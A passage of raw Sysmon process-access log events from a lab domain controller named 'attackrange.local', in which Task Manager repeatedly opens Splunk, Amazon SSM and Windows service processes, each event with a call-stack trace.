Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204993Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D6C-6019-DE00-00000000A301}4008C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204992Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D6C-6019-DE00-00000000A301}4008C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204991Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D6C-6019-DE00-00000000A301}4008C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204990Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D6C-6019-DE00-00000000A301}4008C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204989Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B400-00000000A301}1648C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204988Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B400-00000000A301}1648C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204987Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B400-00000000A301}1648C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204986Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B400-00000000A301}1648C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204985Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204984Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204983Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204982Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204981Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204980Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D4C-6019-9200-00000000A301}4476C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204979Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D4C-6019-9200-00000000A301}4476C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204978Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D4C-6019-9200-00000000A301}4476C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204977Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D4C-6019-9200-00000000A301}4476C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204976Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D4C-6019-9200-00000000A301}4476C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204975Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5900-00000000A301}3964C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204974Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5900-00000000A301}3964C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204973Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5900-00000000A301}3964C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204972Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5900-00000000A301}3964C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204971Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5500-00000000A301}3900C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204970Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5500-00000000A301}3900C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204969Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5500-00000000A301}3900C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204968Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5500-00000000A301}3900C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204967Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CD4-6019-5500-00000000A301}3900C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204966Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3500-00000000A301}3284C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204965Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3500-00000000A301}3284C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204964Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3500-00000000A301}3284C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204963Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3500-00000000A301}3284C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204962Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3500-00000000A301}3284C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204961Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3400-00000000A301}3104C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204960Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3400-00000000A301}3104C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204959Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 